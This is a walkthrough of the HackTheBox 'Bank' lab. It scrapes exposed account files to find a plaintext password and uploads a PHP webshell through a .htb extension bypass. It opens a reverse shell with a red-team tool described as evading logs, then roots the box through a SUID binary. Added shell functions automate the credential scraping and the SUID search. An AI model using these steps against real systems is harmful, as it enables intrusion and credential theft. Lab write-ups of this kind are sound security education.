
Not a ton to talk about for this box. It's an interesting CTF-style machine, but I'm not sure I'd rank it in the OSCP prep category. Just something fun for a low-key Sunday morning 🙂
Defining The Attack Surface


We have 3 open ports and services running.
- 22 – SSH
- 53 – DNS
- 80 – Web Server (http)

Obligatory Nikto scan doesn’t reveal much
Let’s look at the browser

Something to note is that our earlier dig scan did identify the domain bank.htb, so I'm going to add that to my /etc/hosts file and try the browser again.

Something interesting to note

I always look at the source of at least the landing page on these things. Sometimes it pans out, sometimes not. This time, it looks like we may have found something useful. Sticking it in the back pocket for now
~~MORE ENUMERATION REQUIRED~~
I tried a series of password attacks from the dig output. I inferred that chris.bank.htb was actually an email, Chris@Bank.htb, so I tried brute forcing it with hydra and rockyou.txt to no avail.
More enumeration is needed.

This wfuzz scan got us everything we needed. Take note of:
- uploads
- assets
- inc
- server-status
- balance-transfer
You'll want to check each of these out.

/balance-transfer is where the juicy stuff is.

It looks like each of these files contains some type of encrypted user information.
Let's automate pulling this all down for further inspection.
First I fetch the HTML of the page with curl:
curl http://bank.htb/balance-transfer/ > transfers_raw
Then I take that HTML over to http://regex101.com. If you don't regex, you're about to see how magical it is.

I pasted all of the HTML into regex101 and then I wrote a really simple regex to grab all of the links:
(?<=acc\">).*(?=<\/a>)
What this regex says is
(?<=acc\">) – start after acc">
.* – grab everything
(?=<\/a>) – stop at </a>
As you can see from the above screenshot, it successfully grabs all of the filenames.
Next I export it.

I stuck that in a file called account_links, and now we're ready to pull them all down:
for link in $(cat account_links); do wget http://bank.htb/balance-transfer/$link ; done


That command pulled every file down.
Then, to make sure I got it all, I cat'd each one out with:
for file in $(ls); do cat $file ; done
Let's see what we've got.
First I try to just pull the password hashes out. Same command as catting them out, but with a grep in there:
for file in $(ls); do cat $file | grep "Password" ; done

Now let's isolate the hash with cut:
for file in $(ls); do cat $file | grep "Password" | cut -d " " -f2 ; done

And there’s all of our hashes!
As I was scrolling through them looking for anything that stood out, I came across this nugget

Looks like a plaintext password in there. The file size will probably be different, so let's see if we can find the file with ls.
One more time with that bash for loop magic (quick and dirty is my middle name today):
for file in $(ls); do echo $file ; cat $file | grep HTBB4nk ; done
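The curl, regex, wget and grep steps above, folded into a few shell functions. This is an added example, not code from the original writeup, and it runs offline against a constructed directory listing and two constructed .acc files: the listing format (one `<a href="X.acc">X.acc</a>` per line) and the `Password: <value>` line are assumed from what the writeup shows, and the 32-hex-character digest length used to flag the odd entry is an assumption too. It uses `sed` for the extraction rather than the PCRE lookbehind so it also works where grep has no `-P`.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): the listing -> filenames ->
# download -> "Password:" field pipeline as reusable functions.
# Assumptions: Apache-style index with one <a href="X.acc">X.acc</a> per line,
# and a "Password: <value>" line in each account file.

# Constructed sample of the /balance-transfer index page (not the real listing).
SAMPLE_INDEX='<html><body><h1>Index of /balance-transfer</h1><pre>
<a href="../">Parent Directory</a>
<a href="0a1b2c3d.acc">0a1b2c3d.acc</a>
<a href="ffee0011.acc">ffee0011.acc</a>
</pre></body></html>'

# Pull the filenames out of the listing read from stdin. Same idea as the
# regex101 expression (?<=acc">).*(?=</a>), but [^<]* instead of .* so a line
# holding two links can never be swallowed into one match.
extract_links() {
  sed -n 's/.*acc">\([^<]*\)<\/a>.*/\1/p'
}

# Download every listed file from a base URL. This is the writeup's wget loop;
# it is not exercised by the self-test because it needs network access.
fetch_all() {
  local base="$1" list="$2" name
  while IFS= read -r name; do
    [ -n "$name" ] && wget -q "${base%/}/$name"
  done < "$list"
}

# Print "<file> <password field>" for every .acc file in a directory
# (the grep | cut step from the writeup, with the filename kept alongside).
passwords_in() {
  local dir="$1" f
  for f in "$dir"/*.acc; do
    printf '%s %s\n' "$(basename "$f")" "$(grep -m1 '^Password:' "$f" | cut -d ' ' -f2)"
  done
}

# Flag entries whose Password field does not look like a hex digest. The
# writeup spotted the odd file by eye; this makes that check repeatable.
# 32 hex characters is an assumed digest length, adjust for the target.
odd_passwords() {
  passwords_in "$1" | grep -vE ' [0-9a-fA-F]{32}$'
}

# Stand-alone demo: constructed index and account files, pipeline end to end.
demo() {
  local work
  work=$(mktemp -d)
  printf '%s\n' "$SAMPLE_INDEX" > "$work/transfers_raw"
  extract_links < "$work/transfers_raw" > "$work/account_links"
  # Constructed account files (not real box data).
  printf 'Full Name: Test User\nEmail: test@bank.htb\nPassword: 5f4dcc3b5aa765d61d8327deb882cf99\n' > "$work/0a1b2c3d.acc"
  printf 'Full Name: Other User\nEmail: other@bank.htb\nPassword: NotAHash-sample\n' > "$work/ffee0011.acc"
  echo "links found: $(wc -l < "$work/account_links")"
  echo "entries that are not a 32-hex digest:"
  odd_passwords "$work"
  rm -rf "$work"
}
```

Against the real target you would run `curl http://bank.htb/balance-transfer/ | extract_links > account_links`, then `fetch_all http://bank.htb/balance-transfer account_links`, then `odd_passwords .` in the download directory; the one line that is not a digest is the file to open.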


Initial Access

Using our newfound creds, thanks to Chris, we now have access to his account.
Not a ton to see here.
Flipping over to the support page we find a ticket system that allows for file uploads.

The first thing I try is uploading just a plain text file

Then I recalled that we found that little debug comment on the landing page about files with the extension htb


Sure enough, I tried renaming the same file with the .htb extension and it uploaded.
The comment also said that the .htb extension would execute as PHP. Seems pretty obvious this'd be our attack vector for a shell.
First I test it with a simple php script


Okay, now for the shell

No need to reinvent the wheel. Kali has a ton of webshells pre-baked

Don't forget to change the IP and port.

Looks like the upload worked!
Let’s start our listener and open the shell

Too easy. On to root.
Getting Root
Something I have a habit of doing lately is dogfooding my favorite Linux red team shell, ShinobiShell.
Once it’s downloaded to my attacking machine, I start up a shinobi server
./ShinobiShell.py -l 444

Next I pull it down to my victim machine

Starting the Shinobi client is easy. We just give it the -c flag for connect and it will prompt you for your attacking server IP. There are other flags as well; ShinobiShell allows you to set up an encrypted tunnel if you wish.
./ShinobiShell.py -c
Because you're prompted for the IP, port and encryption key after it runs, none of this will live in your logs, which makes it harder to discover.


First stop is grabbing the user.txt flag if we can, and on this machine it appears we can.
Now we move on to privilege escalation
This is where ShinobiShell really shines. It allows you to pull and push information, files and exploits to and from your attacking machine, through the tunnel, with single commands.

Something I like to start with is suid3num
You can easily get it on your victim machine just by typing suid3num.
ShinobiShell will send a request over the tunnel to the ShinobiServer for suid3num, and the ShinobiServer will fetch the latest version and send it back over the tunnel to you.


Once we run suid3num we see there's a binary called emergency in /usr/htb/bin/ that has the SUID bit set.
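What suid3num does at its core, as an added example (not the tool's own code, and not from the original writeup): list every setuid file and strip out the ones that are normally SUID, so a one-off like an `emergency` binary stands out. Handy on a box where you can't pull tools down. The baseline list is an assumed Debian-style set and is not exhaustive; tune it for the target.

```shell
#!/usr/bin/env bash
# Added example (not suid3num, not from the original writeup): enumerate
# setuid files and separate the unusual ones from a known-default baseline.
# Assumption: EXPECTED_SUID is a typical Debian-style set, not a complete list.

# Every regular file with the setuid bit under a root directory.
find_suid() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Binaries that are commonly SUID by default (assumed baseline).
EXPECTED_SUID='passwd su sudo mount umount chsh chfn gpasswd newgrp ping pkexec'

# Keep only the SUID files whose basename is not in the baseline; these are
# the ones worth a closer look, like the emergency binary found above.
unusual_suid() {
  local path name
  find_suid "$1" | while IFS= read -r path; do
    name=$(basename "$path")
    case " $EXPECTED_SUID " in
      *" $name "*) ;;               # known default, skip it
      *) printf '%s\n' "$path" ;;   # custom or unexpected, report it
    esac
  done
}

# Owner, mode and path for each unusual finding. A root-owned one is the
# interesting case, since a setuid binary runs with its owner's uid.
describe_suid() {
  local path
  unusual_suid "$1" | while IFS= read -r path; do
    ls -l "$path"
  done
}

# Stand-alone usage: describe_suid /
```

On a real target run `describe_suid /`; anything root-owned that is not in the baseline (a custom path such as the one above is a giveaway) is the first thing to inspect or run.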
I decided to YOLO and just run it to see what happened. Maybe we'll get some help text on what it does.

JK WE ROOT lol
And that’s the box